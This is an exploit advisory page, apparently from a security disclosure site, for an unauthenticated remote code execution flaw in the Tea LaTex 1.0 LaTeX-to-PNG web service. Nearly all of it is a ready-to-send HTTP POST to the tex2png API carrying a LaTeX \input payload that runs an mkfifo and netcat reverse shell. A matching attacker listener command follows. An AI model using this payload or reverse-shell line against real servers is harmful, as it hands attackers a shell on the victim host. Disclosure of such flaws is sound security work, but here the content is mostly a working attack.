Tea LaTex 1.0 Remote Code Execution

2020.09.13
Credit: nepska
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-09-01 # Exploit Author: nepska # Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org # Software Link: https://github.com/ammarfaizi2/latex.teainside.org # Version: v1.0 # Tested on: Kali linux / Windows 10 # CVE: N/A # Header Requests POST /api.php?action=tex2png HTTP/1.1 Host: latex.teainside.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: text/plain;charset=UTF-8 Content-Length: 64 Origin: https://latex.teainside.org DNT: 1 Connection: keep-alive Referer: https://latex.teainside.org/ Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403 {"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"} # Payload \documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document} # Attacker nc -lvp 1234


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top